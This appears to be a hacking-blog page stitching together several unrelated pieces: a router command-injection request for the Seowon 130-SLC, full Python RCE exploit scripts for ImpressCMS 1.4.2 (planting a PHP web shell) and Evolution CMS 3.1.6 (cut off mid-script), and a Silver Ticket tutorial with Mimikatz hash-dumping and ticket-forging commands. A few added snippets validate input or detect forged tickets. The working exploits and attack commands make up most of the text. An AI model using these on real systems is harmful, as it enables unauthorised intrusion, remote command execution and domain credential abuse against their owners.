About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: Seowon 130-SLC router - 'queriesCnt' Remote Code Execution (Unauthenticated)
# Date: 2021-09-15
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: http://www.seowonintech.co.kr
# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kindB05&middle_kindB05_29
# Version: All versions
# Tested on: Windows 10 Enterprise x64, Linux

# [ About - Seowon 130-SLC router ] :

# The SLC-130 series is an all-in-one LTE CPE built for multi-purpose environments that require data and WiFi.
# Its sophisticated and stable operation serves office and home use alike,
# improving communication and easing everyday life.

# [ Description ]:

# Commands are executed without authentication, as the admin user.
# It works on all versions; only the router IP and port (if any) need to be set in the request.
# The result of the command is visible on the browser page.

# [ Sample RCE Request ] :

POST / HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.1:443/diagnostic.html?t=201701020919
Content-Length: 183
Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte;
cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0;
cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0;
cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin
Connection: keep-alive

Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;ls&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928
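The injection above lands because the diagnostic form hands `queriesCnt` to a shell command as-is. As an added example (not vendor code), the validator below accepts each numeric field only as a bounded integer, so a value such as `;ls` is rejected before it can reach the traceroute command, and a second function gives a defender the same check over captured request bodies. The integer ranges and the enum vocabularies beyond the values on the page are assumptions.

```python
import ipaddress
import re
from urllib.parse import unquote_plus

# Constructed sample: the request body from the advisory above, carrying ";ls"
# in queriesCnt.
INJECTED_BODY = (
    "Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56"
    "&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;ls"
    "&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928"
)
# Constructed sample: the same form as the router UI would submit it.
BENIGN_BODY = (
    "Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56"
    "&pingTimeout=30&pingCount=4&ipAddr=192.168.1.254&maxTTLCnt=30&queriesCnt=3"
    "&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928"
)

# Fields that should only ever reach the ping/traceroute command as bounded
# integers. The ranges are assumptions, not vendor values.
INT_FIELDS = {
    "pingPktSize": (1, 65500),
    "pingTimeout": (1, 300),
    "pingCount": (1, 100),
    "maxTTLCnt": (1, 255),
    "queriesCnt": (1, 10),
}
# Fixed-vocabulary fields. Only "Diagnostic", "trace" and "0" appear on the
# page; the remaining members are assumed.
ENUM_FIELDS = {
    "Command": {"Diagnostic"},
    "traceMode": {"trace", "ping"},
    "reportIpOnly": {"0", "1"},
}
SHELL_META = re.compile(r"[;|&`$<>(){}\r\n]")
HOSTNAME = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")
DIGITS = re.compile(r"[0-9]+")


def parse_form(body):
    """Split an application/x-www-form-urlencoded body on '&' only, so a ';'
    inside a value stays inside that value; the first occurrence of a key wins."""
    form = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        form.setdefault(unquote_plus(key), unquote_plus(value))
    return form


def validate_diagnostic_form(body):
    """Allowlist validation for the diagnostic form. Returns (field, reason)
    pairs; an empty list means every field is safe to hand to the backend."""
    form = parse_form(body)
    errors = []
    for field, (lo, hi) in INT_FIELDS.items():
        raw = form.get(field, "")
        if not DIGITS.fullmatch(raw) or not lo <= int(raw) <= hi:
            errors.append((field, "must be an integer in [%d, %d]" % (lo, hi)))
    for field, allowed in ENUM_FIELDS.items():
        if form.get(field) not in allowed:
            errors.append((field, "value not in allowed set"))
    target = form.get("ipAddr", "")
    if target:
        try:
            ipaddress.ip_address(target)
        except ValueError:
            if not HOSTNAME.match(target):
                errors.append(("ipAddr", "neither an IP address nor a hostname"))
    return errors


def shell_metachar_fields(body):
    """Detection view for log review: the fields whose value carries shell
    metacharacters, which a legitimate diagnostic submission never needs."""
    return sorted(k for k, v in parse_form(body).items() if SHELL_META.search(v))
```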
            
# Exploit Title: ImpressCMS 1.4.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 15-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.impresscms.org/
# Software Link: https://www.impresscms.org/modules/downloads/
# Version: 1.4.2
# Category: Webapps
# Tested on: Linux/Windows

# ImpressCMS is a multilingual content management system for the web.
# It exposes an endpoint that allows remote access:
# the Autotasks page is misconfigured, which causes the security vulnerability.



# Example: python3 exploit.py -u http://example.com -l admin -p Admin123

import requests
import argparse
import sys
from time import sleep

session = requests.session()

def main():
	parser = argparse.ArgumentParser(description='Impresscms Version 1.4.2 - Remote Code Execution (Authenticated)')
	parser.add_argument('-u', '--host', type=str, required=True)
	parser.add_argument('-l', '--login', type=str, required=True)
	parser.add_argument('-p', '--password', type=str, required=True)
	args = parser.parse_args()
	print("\nImpresscms Version 1.4.2 - Remote Code Execution (Authenticated)",
		  "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
	exploit(args)

def countdown(time_sec):
    while time_sec:
        mins, secs = divmod(time_sec, 60)
        timeformat = '{:02d}'.format(secs)
        print("["+timeformat+"] The task is expected to run!", end='\r')
        sleep(1)
        time_sec -= 1

def exploit(args):
	#Check http or https
	if args.host.startswith(('http://', 'https://')):
		print("[?] Check Url...\n")
		args.host = args.host
		if args.host.endswith('/'):
			args.host = args.host[:-1]
		sleep(2)
	else:
		print("\n[?] Check Adress...\n")
		args.host = "http://" + args.host
		args.host = args.host
		if args.host.endswith('/'):
			args.host = args.host[:-1]
		sleep(2)

	try:
		response = requests.get(args.host)
		if response.status_code != 200:
			print("[-] Address not reachable!")
			sleep(2)
			exit(1)
	except requests.ConnectionError as exception:
		print("[-] Address not reachable")
		exit(1)


	response = requests.get(args.host + "/evil.php")
	if response.status_code == 200:
		print("[*] Exploit file exists!\n")
		sleep(2)
		print("[+] Exploit Done!\n")

		while True:
			cmd = input("$ ")
			url = args.host + "/evil.php?cmd=" + cmd
			headers = {
				"Upgrade-Insecure-Requests": "1",
				"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
			}

			response = requests.post(url, headers=headers, timeout=5)

			if response.text == "":
				print(cmd + ": command not found\n")
			else:
				print(response.text)

	else:
		#Login and set cookie
		url = args.host + "/user.php"
		cookies = {
			"ICMSSESSION": "gjj2svl7qjqorj5rs87b6thmi5"
		}

		headers = {
			"Cache-Control": "max-age=0",
			"Upgrade-Insecure-Requests": "1",
			"Origin": args.host,
			"Content-Type": "application/x-www-form-urlencoded",
			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
			"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
			"Referer": args.host,
			"Accept-Encoding": "gzip, deflate",
			"Accept-Language": "en-US,en;q=0.9",
			"Connection": "close"
		}

		data = {
			"uname": args.login,
			"pass": args.password,
			"xoops_redirect": "/",
			"op": "login"
		}

		response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)
		new_cookies = session.cookies.get("ICMSSESSION")

		if (new_cookies is None):
			print("[-] Login Failed...\n")
			print("Your username or password is incorrect.")
			sleep(2)
			exit(1)
		else:
			print("[+] Success Login...\n")
			sleep(2)

			# Create Tasks
			url = args.host + "/modules/system/admin.php?fct=autotasks&op=mod"
			cookies = {
			    "ICMSSESSION": new_cookies
			}

			headers = {
			    "Cache-Control": "max-age=0",
			    "Upgrade-Insecure-Requests": "1",
			    "Origin": args.host,
			    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryZ2hA91yNO8FWPZmk",
			    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
			    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
			    "Referer": args.host + "/modules/system/admin.php?fct=autotasks&op=mod",
			    "Accept-Encoding": "gzip, deflate",
			    "Accept-Language": "en-US,en;q=0.9",
			    "Connection": "close"
			}

			data = "------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_id\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_lastruntime\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_name\"\r\n\r\nrce\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_code\"\r\n\r\nfile_put_contents('../evil.php', \"<?php system(\\x24_GET['cmd']); ?>\");\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_repeat\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_interval\"\r\n\r\n0001\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_onfinish\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_enabled\"\r\n\r\n1\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_type\"\r\n\r\n:custom\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_addon_id\"\r\n\r\n\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"icms_page_before_form\"\r\n\r\n"+args.host+"/modules/system/admin.php?fct=autotasks\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"op\"\r\n\r\naddautotasks\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"modify_button\"\r\n\r\nSubmit\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk--\r\n"
			response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)

			if response.headers.get("location") == args.host + "/modules/system/admin.php?fct=autotasks":
				print("[*] Task Create.\n")
				sleep(2)

				countdown(60)

				print("\n\n[+] Exploit Done!\n")
				sleep(2)

				while True:
					cmd = input("$ ")
					url = args.host + "/evil.php?cmd=" + cmd
					headers = {
						"Upgrade-Insecure-Requests": "1",
						"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
					}

					response = requests.post(url, headers=headers, timeout=5)
					if response.text == "":
						print(cmd + ": command not found\n")
					else:
						print(response.text)
			elif response.headers.get("location") == args.host + "/user.php":
				print("[!] Unauthorized user!\n\n")
				print("Requires user with create task permissions.")
				sleep(2)
			else:
				pass


if __name__ == '__main__':
	main()
            

0x01 Silver Ticket definition

A Silver Ticket is a forged Kerberos Ticket Granting Service (TGS) ticket, also called a service ticket. As shown in the figure, there is no AS-REQ/AS-REP (steps 1 and 2) and no TGS-REQ/TGS-REP (steps 3 and 4) communication with the domain controller. Because the ticket is a forged TGS, it never communicates with the domain controller.

0x02 Characteristics of Silver Tickets

1. A Silver Ticket is a valid Ticket Granting Service (TGS) Kerberos ticket, because the Kerberos service running on each server encrypts and signs its own service tickets.

2. A Golden Ticket forges the TGT, which can then be used against any Kerberos service; a Silver Ticket forges the TGS. This means a Silver Ticket is limited to services on one specific server.

3. Most services do not validate the PAC (which would mean sending the PAC checksum to the domain controller for PAC validation).

4. The attacker needs the password hash of the service account.

5. Because the TGS is forged, no TGT exchange takes place, so the domain controller never validates it.

6. Any event logs are on the target server only.
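Points 5 and 6 are the defender's handle: a forged TGS never produces a 4769 on the domain controller, yet the target server still records a 4624 for it, and the Mimikatz default lifetime far exceeds the domain policy. The following is an added example (not from the original article) of both checks over constructed event data; account names are assumed to be normalised before comparison.

```python
from datetime import datetime, timedelta

# Constructed sample events, not real logs. HOST_4624 are network logons from
# the Security log of the member server ADSMSWIN2K8R2; DC_4769 are the TGS
# requests the domain controller recorded in the same period.
HOST_4624 = [
    {"time": "2021-09-15T09:00:05", "account": "svc_backup", "logon_type": 3,
     "auth_package": "Kerberos", "src_ip": "10.0.0.50"},
    {"time": "2021-09-15T09:12:40", "account": "lukeskywalker", "logon_type": 3,
     "auth_package": "Kerberos", "src_ip": "10.0.0.77"},
    {"time": "2021-09-15T09:15:00", "account": "helpdesk1", "logon_type": 3,
     "auth_package": "NTLM", "src_ip": "10.0.0.80"},
]
DC_4769 = [
    {"time": "2021-09-15T09:00:01", "account": "svc_backup",
     "service": "ADSMSWIN2K8R2$", "src_ip": "10.0.0.50"},
]
TARGET_ACCOUNT = "ADSMSWIN2K8R2$"   # computer account whose services are ticketed

# Constructed klist-style entries for the same server. The AD default ticket
# lifetime is 10 hours; a ticket forged with the Mimikatz default /endin runs
# for 10 years.
KLIST = [
    {"client": "lukeskywalker@LAB.ADSECURITY.ORG",
     "server": "cifs/adsmswin2k8r2.lab.adsecurity.org",
     "start": "2021-09-15T09:12:40", "end": "2031-09-13T09:12:40"},
    {"client": "svc_backup@LAB.ADSECURITY.ORG",
     "server": "cifs/adsmswin2k8r2.lab.adsecurity.org",
     "start": "2021-09-15T09:00:01", "end": "2021-09-15T19:00:01"},
]


def _ts(s):
    return datetime.fromisoformat(s)


def unbacked_kerberos_logons(host_events, dc_events, target_account,
                             window=timedelta(minutes=10)):
    """Kerberos network logons (4624, type 3) on the target server for which the
    DC has no 4769 for the same user and the server's account in the preceding
    window. A forged TGS never touches the DC, so this is what a Silver Ticket
    looks like. Assumes the 4769 feed covers every DC in the domain; a gap in
    that feed produces false positives."""
    hits = []
    for logon in host_events:
        if logon["logon_type"] != 3 or logon["auth_package"] != "Kerberos":
            continue
        t = _ts(logon["time"])
        backed = any(
            e["account"] == logon["account"] and e["service"] == target_account
            and t - window <= _ts(e["time"]) <= t
            for e in dc_events
        )
        if not backed:
            hits.append(logon)
    return hits


def tickets_exceeding_policy(entries, max_lifetime=timedelta(hours=10)):
    """Service tickets whose lifetime exceeds what the domain Kerberos policy
    allows, a second artifact of the Mimikatz defaults described above."""
    return [e for e in entries if _ts(e["end"]) - _ts(e["start"]) > max_lifetime]
```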

0x03 Creating a Silver Ticket

To create or forge a Silver Ticket, the attacker needs the password hash of the target service account. If the target service runs under a user account (MS SQL, for example), the service account's password hash is required to create the ticket. Cracking service account passwords with kerberoast (https://github.com/nidem/kerberoast) is an effective way to identify the password data associated with the target service. The most common service is one hosted by the computer itself: the "CIFS" service that serves Windows file shares. Because the computer itself hosts this service, the password data needed to create the Silver Ticket is the password hash of the associated computer account. When a computer joins Active Directory, a new computer account object is created and linked to the computer. The password and its hash are stored on the computer that owns the account, and the NTLM password hash is stored in the Active Directory database on the domain's domain controllers. If an attacker obtains administrator rights on the computer, or can run code as local SYSTEM, the AD computer account password can be dumped from the system with Mimikatz (the NTLM password hash is what encrypts RC4 Kerberos tickets):

mimikatz "privilege::debug" "sekurlsa::logonpasswords"   # requires administrator rights

0x04 Mimikatz Silver Ticket command parameters

/domain - the fully qualified domain name, e.g. lab.adsecurity.org

/sid - the domain SID, e.g. S-1-5-21-1473643419-774954089-2222329127

/user - the domain user name

/groups (optional) - the groups the user belongs to

/ticket (optional) - path and file name under which to save the Golden Ticket file for later use, or use /ptt to inject the ticket into memory for immediate use

/ptt - alternative to /ticket; injects the forged ticket into memory immediately for use

/id (optional) - the user RID; the Mimikatz default is 500 (the RID of the built-in Administrator account)

/startoffset (optional) - start offset from which the ticket is usable (usually -10 or 0 when this option is used); the Mimikatz default is 0

/endin (optional) - ticket lifetime; the Mimikatz default is 10 years, whereas the Active Directory default Kerberos policy is 10 hours

/renewmax (optional) - maximum renewal lifetime; the Mimikatz default is 10 years, whereas the Active Directory default Kerberos policy is 7 days

1. Parameters required for a Silver Ticket

/target - FQDN of the target server

FQDN (Fully Qualified Domain Name): a name that contains both the host name and the domain name (joined by the "." symbol).

/service - the Kerberos service running on the target server; the service principal name type, such as cifs, http or mssql

/rc4 - the NTLM hash of the service account (computer account or user account)

2. Silver Ticket default groups

Domain Users SID: S-1-5-21<DOMAIN>-513

Domain Admins SID: S-1-5-21<DOMAIN>-512

Schema Admins SID: S-1-5-21<DOMAIN>-518

Enterprise Admins SID: S-1-5-21<DOMAIN>-519

Group Policy Creator Owners SID: S-1-5-21<DOMAIN>-520

3. Mimikatz command to create a Silver Ticket

The following Mimikatz command creates a Silver Ticket for the CIFS service on the server adsmswin2k8r2.lab.adsecurity.org. To create the Silver Ticket successfully, Mimikatz must be run against an AD domain dump or as local SYSTEM to obtain the hash of the AD computer account password of adsmswin2k8r2.lab.adsecurity.org. The NTLM password hash is used in the /rc4 parameter. The service SPN type must also be given in the /service parameter. The target computer's FQDN is used in the /target parameter and the domain SID in the /sid parameter. The command is:

mimikatz "kerberos::golden /user:lukeskywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-777749494089-22229127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt" exit

0x05 Practical list of Silver Tickets for various services

1. Service list for Silver Tickets

Service type                                    Service Silver Ticket(s)
WMI                                             HOST, RPCSS
PowerShell Remoting                             HOST, HTTP
WinRM                                           HOST, HTTP
Scheduled Tasks                                 HOST
Windows File Share (CIFS)                       CIFS
LDAP operations, including Mimikatz DCSync      LDAP
Windows Remote Server Administration Tools      RPCSS, LDAP, CIFS

2. Windows share (CIFS) administrative access ticket

Create a Silver Ticket for the "CIFS" service to obtain administrative rights to the Windows shares on the target computer.

After injecting the CIFS Silver Ticket, the shares on the target computer, such as the c$ share, can be accessed and files can be copied to the share.

3. Silver Ticket with administrator rights on a Windows computer (HOST)

Create a Silver Ticket for the HOST service to obtain administrator rights to the Windows services covered by HOST on the target computer. This includes the rights to create and modify scheduled tasks.

With a HOST Silver Ticket, new scheduled tasks can be created.

Alternatively, by leveraging the HOST Silver Ticket, existing scheduled tasks can be modified.

Create Silver Tickets for the "HTTP" and "WSMAN" services to obtain administrative rights to WinRM and/or PowerShell Remoting on the target system.

After injecting the two HTTP and WSMAN Silver Tickets, PowerShell Remoting (or WinRM) can be used to obtain a shell on the target system. First, New-PSSession, the PowerShell cmdlet for creating a session to a remote system, creates the session, and then Enter-PSSession opens the remote shell.

5. Evidence of a Silver Ticket: connecting to LDAP on a Windows computer with administrator rights

Create a Silver Ticket for the "LDAP" service to obtain administrative rights to the LDAP service on the target system (including Active Directory).

With an LDAP Silver Ticket, the LDAP service can be accessed remotely to retrieve information about KRBTGT.

Note: lsadump::dcsync

Asks the DC to synchronize an object (so that the account's password data can be retrieved). The required permissions are Administrators, Domain Admins, Enterprise Admins or the domain controller's computer account. On a read-only domain controller, user password data cannot be read by default.

6. Evidence of a Silver Ticket: connecting to WMI on a Windows computer with administrator rights

Create Silver Tickets for the "HOST" and "RPCSS" services to execute commands remotely on the target system via WMI.

After injecting these Silver Tickets, running "klist" confirms that the Kerberos TGS tickets (the Silver Tickets) have been injected into memory. WMIC can then be invoked, or Invoke-WmiMethod can be used against the target, to execute commands on the target system.

Invoke-WmiMethod win32_process -ComputerName $computer -Credential $creds -Name create -ArgumentList "$runcommand"

7. Accessing the "CIFS" service on the domain controller

First, the following information must be obtained:

/domain

/sid

/target: the fully qualified domain name of the target server; here, the FQDN of the domain controller

/service: the Kerberos service on the target server; here, cifs

/rc4: the NTLM hash of the computer account; here, the computer account of the domain controller host

/user: the user name to forge; here "silver" can be used for testing

Run the following command on the domain controller to obtain the domain controller host's local administrator account:

mimikatz log 'sekurlsa::logonpasswords'

As shown in the figure.

Note:

Here the NTLM hash of the computer account, i.e. the user name WIN-8VVLRPIAJB0$, must be located. With any other account it fails; that is, the account that hosts the service must be used.

The information gathered above is:

/domain:test.local

/sid:S-1-5-21-4155807533-921486164-2767329826

/target:win-8vvlrpiajb0.test.local

/service:cifs

/rc4:D5304F9EA69523479560CA4EBB5A2155

/user:silver

Import the Silver Ticket with Mimikatz:

mimikatz 'kerberos::golden /domain:test.local /sid:S-1-5-21-4155807533-921486164-2767329826 /target:win-8vvlrpiajb0.test.local /service:cifs /rc4:D5304F9EA69523479560CA4EBB5A2155 /user:silver /ptt'

As shown in the figure, at this point the file share on the domain controller can be accessed successfully.

# Exploit Title: Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)
# Date: 15-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://evo.im/
# Software Link: https://github.com/evolution-cms/evolution/releases
# Version: 3.1.6
# Category: Webapps
# Tested on: Linux/Windows


# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
#	   python3 exploit.py -h


from bs4 import BeautifulSoup
from time import sleep
import requests
import argparse
import sys

def main():
	parser = argparse.ArgumentParser(description='Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)')
	parser.add_argument('-u', '--host', type=str, required=True)
	parser.add_argument('-l', '--login', type=str, required=True)
	parser.add_argument('-p', '--password', type=str, required=True)
	args = parser.parse_args()
	print("\nEvolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)",
		  "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
	sleep(2)
	exploit(args)

def exploit(args):

	#Check http or https
	if args.host.startswith(('http://', 'https://')):
		print("[?] Check Url...\n")
		args.host = args.host
		if args.host.endswith('/'):
			args.host = args.host[:-1]
		sleep(2)
	else:
		print("\n[?] Check Adress...\n")
		args.host = "http://" + args.host
		args.host = args.host
		if args.host.endswith('/'):
			args.host = args.host[:-1]
		sleep(2)

	# Check Host Status
	try:
		response = requests.get(args.host)
		if response.status_code != 200:
			print("[-] Address not reachable!")
			sleep(2)
			exit(1)

	except requests.ConnectionError as exception:
		print("[-] Address not reachable!")
		sleep(2)
		exit(1)


	# Login and cookie set
	session = requests.session()
	url = args.host + "/manager/?a=0"
	cookies = {
		"mybb[lastvisit]": "1631537273",
		"loginattempts": "1",
		"mybb[lastactive]": "1631537588",
		"mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn",
		"evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq",
		"KCFINDER_showname": "on",
		"KCFINDER_showsize": "off",
		"KCFINDER_showtime": "off",
		"KCFINDER_order": "name",
		"KCFINDER_orderDesc": "off",
		"KCFINDER_view": "thumbs",
		"KCFINDER_displaySettings": "off",
		"evoq28fzr": "o0hd9im6q76pptjcsjeaa693os"
	}

	headers = {
		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
		"Content-Type": "application/x-www-form-urlencoded;",
		"Accept": "*/*",
		"Origin": args.host,
		"Referer": args.host + "/manager/",
		"Accept-Encoding": "gzip, deflate",
		"Accept-Language": "en-US,en;q=0.9",
		"Connection": "close"
	}

	data = {
		"ajax": "1",
		"username": args.login,
		"password": args.password,
		"rememberme": "1"
	}

	response = session.post(url, headers=headers, cookies=cookies, data=data, timeout=5)
	new_cookie = response.cookies.get("evoq28fzr")
	user_role = response.cookies.get("modx_remember_manager")

	if user_role is None:
		print("[-] Login Failed!\n")
		print("[*]",response.text)
		sleep(2)
		exit(1)
	else:
		print("[+] Login Success!\n")
		sleep(2)
		print("[!] Login User", user_role,"\n")
		sleep(2)


	# User authorization check
	url = args.host + "/manager/index.php"
	cookies = {
		"mybb[lastvisit]": "1631537273",
		"loginattempts": "1",
		"mybb[lastactive]": "1631537588",
		"mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn",
		 "evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq",
		 "KCFINDER_showname": "on",
		 "KCFINDER_showsize": "off",
		 "KCFINDER_showtime": "off",
		 "KCFINDER_order": "name",
		 "KCFINDER_orderDesc": "off",
		 "KCFINDER_view": "thumbs",
		 "KCFINDER_displaySettings": "off",
		 "webfxtab_modulePane": "0",
		 "evoq28fzr": new_cookie,
	}

	headers = {
		"Cache-Control": "max-age=0",
		"Upgrade-Insecure-Requests": "1",
		"Origin": args.host,
		"Content-Type": "application/x-www-form-urlencoded",
		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
		"Referer": args.host + "/manager/index.php?a=108&id=1",
		"Accept-Encoding": "gzip, deflate",
		"Accept-Language": "en-US,en;q=0.9",
		"Connection": "close"
	}
	data = {
		"a": "109",
		"id": "1",
		"mode": "108",
		"stay": "2",
		"name": "rce",
		"description": "<strong>0.1.3</strong> first repository for Evolution CMS ",
		"categoryid": "1",
		"newcategory": '',
		"icon": '',
		"resourcefile": '',
		"post": "system('whoami');",
		"guid": "8d4669cac3afd1f59d416f11eadf3355",
		"properties": "{}",
		"chkallgroups": "on",
		"save": "Submit"
	}

	response = requests.post(url, headers=headers, cookies=cookies, data=data, timeout=5)
	soup = BeautifulSoup(response.text, 'html.parser')

	if soup.find_all("title")[0].text == "My Evolution Site (Evolution CMS Manager Login)":
		print("[!] Unauthorized user\n\n")
		print("User with module creation permissions is required.")
		exit(1)
	elif soup.find_all("p")[0].text == "You don't have enough privileges for this action!":
		print("[!] Unauthorized user\n\n")
		print("User with module creation permissions is required.")
		exit(1)
	else:
		print ("[+] Exploit Done!\n")
		sleep(2)
		pass

	while True:
		cmd = input("$ ")

		# Update Modules
		url = args.host + "/manager/index.php"
		cookies = {
			"mybb[lastvisit]": "1631537273",
			"loginattempts": "1",
			"mybb[lastactive]": "1631537588",
			"mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn",
			 "evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq",
			 "KCFINDER_showname": "on",
			 "KCFINDER_showsize": "off",
			 "KCFINDER_showtime": "off",
			 "KCFINDER_order": "name",
			 "KCFINDER_orderDesc": "off",
			 "KCFINDER_view": "thumbs",
			 "KCFINDER_displaySettings": "off",
			 "webfxtab_modulePane": "0",
			 "evoq28fzr": new_cookie,
		}

		headers = {
			"Cache-Control": "max-age=0",
			"Upgrade-Insecure-Requests": "1",
			"Origin": args.host,
			"Content-Type": "application/x-www-form-urlencoded",
			"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
			"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
			"Referer": args.host + "/manager/index.php?a=108&id=1",
			"Accept-Encoding": "gzip, deflate",
			"Accept-Language": "en-US,en;q=0.9",
			"Connection": "close"
		}

		data = {
			"a": "109",
			"id": "1",
			"mode": "108",
			"stay": "2",
			"name": "rce",
			"description": "<strong>0.1.3</strong> first repository for Evolution CMS ",
			"categoryid": "1",
			"newcategory": '',
			"icon": '',
			"resourcefile": '',
			"post": "system('"+cmd+"');",
			"guid": "8d4669cac3afd1f59d416f11eadf3355",
			"properties": "{}",
			"chkallgroups": "on",
			"save": "Submit"
		}

		response = requests.post(url, headers=headers, cookies=cookies, data=data, timeout=5)


		# Run Modules
		url = args.host + "/manager/index.php?id=1&a=112"
		cookies = {
			"mybb[lastvisit]": "1631537273",
			"loginattempts": "1",
			"mybb[lastactive]": "1631537588",
			"mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn",
			"evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq",
			"KCFINDER_showname": "on",
			"KCFINDER_showsize": "off",
			"KCFINDER_showtime": "off",
			"KCFINDER_order": "name",
			"KCFINDER_orderDesc": "off",
			"KCFINDER_view": "thumbs",
			"KCFINDER_displaySettings": "off",
			"webfxtab_modulePane": "0",
			"evoq28fzr": new_cookie,
		}

		headers = {
			"Upgrade-Insecure-Requests": "1",
			"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
			"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
			"Referer": args.host + "/manager/index.php?a=108&id=1",
			"Accept-Encoding": "gzip, deflate",
